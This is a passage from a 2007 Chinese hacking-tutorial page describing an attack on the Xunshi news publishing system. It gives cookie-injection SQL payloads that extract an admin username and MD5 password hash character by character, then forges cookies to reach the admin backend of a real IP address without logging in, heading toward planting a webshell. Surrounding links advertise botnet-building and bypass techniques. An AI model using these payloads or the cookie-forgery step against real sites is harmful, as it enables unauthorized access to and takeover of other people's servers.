·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 > 文章中心 > 黑客技术
三顾讯时--对讯时新闻发布系统的艰难突破(图)
http://www.anqn.com     时间:2007-9-24 2:15:35      责任编辑:高远      网友评论
热 点:


    
   说明我们提交的url已经有参与了sql查询,而且查询所得结果为真。再提交:
  javascript:alert(document.cookie="newsid="+escape("26 and (select asc(mid(user,1,1)) from [admin] where id=1)=97"))
   返回如图4所示:
  


   判断id=1的user(管理员)的第一个字符的ascii码值是否为97。相信大家以前看过花花的文章,大概的cookie注入也就这样了。下面是猜密码的。
  javascript:alert(document.cookie="newsid="+escape("26 and (select asc(mid(pass,1,1)) from [admin] where id=1)=97"))

  通过一一猜解所得的用户名和密码的ASSCII分别是97 100 109 105 110,50 49 50 51 50 102 50 57 55 97 53 55 97 53 97 55 52 51 56 57 52 97 48 101 52 97 56 48 49 102 99 51,转换后的结果分别是admin和21232f297a57a5a743894a0e4a801fc3。然后我们不必去破解密码,拿出老兵叔的cookie欺骗工具,在cookies栏里输入:admindj=1; adminpass=21232f297a57a5a743894a0e4a801fc3; adminuser=admin; (保持绿色小球处于按下状态)然后在address栏里输入:http://222.90.4.20/news/admin_index.asp,提交!这样我们就可以不经登陆直接进到后台了。如图5所示:


  
  进到后台就是拿WEBSHELL了。打开网友投稿,如图6所示:

上一页 1 2 3 4 5 6 下一页

·上一篇: 整个服务器群的沦陷:一次曲折的安全检测
·下一篇: 135批量抓肉鸡 批量开TELNET

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·冒充“超级兔子” 木马突破软键盘(图) [2007-9-25]
·突破SQL注入攻击时输入框长度的限制 [2007-9-22]
·AK922:突破磁盘低级检测实现文件隐藏 [2007-9-21]
·突破两大难题 江民KV2008正式发布(图) [2007-9-13]
·网吧突破1433封锁继续冲钱 [2007-9-15]
·突破腾讯空间限制暴传图片(不是黄钻) [2007-9-14]
·在网吧建立外网IP玩传奇私服和突破限制 [2007-9-13]
·我是如何突破一流检测系统的 [2007-9-9]
·突破SQL注入攻击时输入框长度的限制 [2007-9-4]
·突破网关进入内网 巧妙利用端口重定向 [2007-9-2]